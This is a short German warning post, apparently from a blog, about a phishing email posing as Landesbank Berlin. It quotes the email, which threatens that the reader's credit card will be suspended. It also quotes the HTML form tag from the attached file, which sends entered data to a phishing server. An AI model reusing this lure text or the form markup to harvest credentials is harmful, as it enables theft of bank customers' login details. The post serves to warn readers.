„Von: www.lbb.de [mailto:[email protected]] 

Gesendet: Montag, 4. November 2013 23:43
Betreff: [Info] Ihre Karte wird Suspendiert 05.11.2013
Wichtigkeit: Hoch

Sehr geehrter Kunde,
————————————————–

Wir haben unregelmäßige Aktivität Ihrer Kreditkarte erkannt.
Zu Ihrem Schutz, beschränken wir es, bis Sie Ihre Angaben Bestätigung.

Bitte laden Sie das angehängte Dokument und überprüfen Sie Ihre Daten.
Wenn Sie diese E-Mail ignorieren Ihre Karte gesperrt wird.
————————————————–
Bitte verwenden Sie die Website auf dem Laufenden bleiben.
Nutzen Sie diese Gelegenheit, um unser Unternehmen und unsere Reserven einzuführen.

Vielen Dank,
Kundendienst.

Urheberrecht Landesbank Berlin. Alle Rechte vorbehalten. „

Die der E-Mail angehängte Datei „LBB – Form.htm“ läd von der original Webseite der Landesbank Berlin die Original-Grafiken, der entscheidende Link jedoch führt dann auf den Server mit der Phishing-Malware:
„<form name=“preLogonForm“ method=“post“ action=“h**p://inforumahgresik.com/wp-includes/images/wlw/x/mail.php“ autocomplete=“off“><input type=“hidden“ name=“org.apache.struts.taglib.html.TOKEN“ value=“2a7fdf5046d948b296cf7b25722d5411″><input type=“hidden“ name=“ref“ value=“1200_LBB“><input type=“hidden“ name=“service“ value=“COS“>„

Wie immer gilt auch hier: Mail einfach löschen.